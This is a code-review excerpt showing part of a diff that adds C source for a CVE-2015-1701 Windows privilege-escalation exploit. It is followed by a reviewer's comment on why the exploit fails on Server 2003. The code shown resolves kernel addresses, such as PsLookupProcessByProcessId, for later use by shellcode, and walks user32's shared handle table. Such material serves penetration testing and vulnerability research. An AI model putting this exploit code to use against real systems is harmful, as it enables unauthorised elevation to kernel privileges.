external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c

```diff
@@ -0,0 +1,524 @@
+		if (Buffer != NULL) {
+			status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
+		}
+		else {
+			return NULL;
+		}
+		if (status == STATUS_INFO_LENGTH_MISMATCH) {
+			HeapFree(GetProcessHeap(), 0, Buffer);
+			Size *= 2;
+		}
+		c++;
+		if (c > 100) {
+			status = STATUS_SECRET_TOO_LONG;
+			break;
+		}
+	} while (status == STATUS_INFO_LENGTH_MISMATCH);
+
+	if (NT_SUCCESS(status)) {
+		return Buffer;
+	}
+
+	if (Buffer) {
+		HeapFree(GetProcessHeap(), 0, Buffer);
+	}
+	return NULL;
+}
+
+/*
+* supIsProcess32bit
+*
+* Purpose:
+*
+* Return TRUE if given process is under WOW64, FALSE otherwise.
+*
+*/
+BOOLEAN supIsProcess32bit(
+	_In_ HANDLE hProcess
+	)
+{
+	NTSTATUS status;
+	PROCESS_EXTENDED_BASIC_INFORMATION pebi;
+
+	if (hProcess == NULL) {
+		return FALSE;
+	}
+
+	//query if this is wow64 process
+	RtlSecureZeroMemory(&pebi, sizeof(pebi));
+	pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
+	status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
+	if (NT_SUCCESS(status)) {
+		return (pebi.IsWow64Process == 1);
+	}
+	return FALSE;
+}
+
+/*
+* GetPsLookupProcessByProcessId
+*
+* Purpose:
+*
+* Return address of PsLookupProcessByProcessId routine to be used next by shellcode.
+*
+*/
+ULONG_PTR GetPsLookupProcessByProcessId(
+	VOID
+	)
+{
+	BOOL						cond = FALSE;
+	ULONG						rl = 0;
+	PVOID						MappedKernel = NULL;
+	ULONG_PTR					KernelBase = 0L, FuncAddress = 0L;
+	PRTL_PROCESS_MODULES		miSpace = NULL;
+	CHAR						KernelFullPathName[MAX_PATH * 2];
+
+
+	do {
+
+		miSpace = supGetSystemInfo(SystemModuleInformation);
+		if (miSpace == NULL) {
+			break;
+		}
+
+		if (miSpace->NumberOfModules == 0) {
+			break;
+		}
+
+		rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
+		if (rl == 0) {
+			break;
+		}
+
+		KernelFullPathName[rl] = (CHAR)'\\';
+		strcpy(&KernelFullPathName[rl + 1],
+			(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
+		KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
+		HeapFree(GetProcessHeap(), 0, miSpace);
+		miSpace = NULL;
+
+		MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
+		if (MappedKernel == NULL) {
+			break;
+		}
+
+		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
+		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
+
+	} while (cond);
+
+	if (MappedKernel != NULL) {
+		FreeLibrary(MappedKernel);
+	}
+	if (miSpace != NULL) {
+		HeapFree(GetProcessHeap(), 0, miSpace);
+	}
+
+	return FuncAddress;
+}
+
+/*
+* GetFirstThreadHWND
+*
+* Purpose:
+*
+* Locate, convert and return hwnd for current thread from SHAREDINFO->aheList.
+*
+*/
+HWND GetFirstThreadHWND(
+	VOID
+	)
+{
+	PSHAREDINFO		pse;
+	HMODULE			huser32;
+	PHANDLEENTRY	List;
+	ULONG_PTR		c, k;
+
+	huser32 = GetModuleHandle(TEXT("user32.dll"));
+	if (huser32 == NULL)
+		return 0;
+
+	pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");

```

Comment:
My guess is that this is why the exploit is not working on server 2003. ```user32!gSharedInfo``` is not available on older versions of Windows.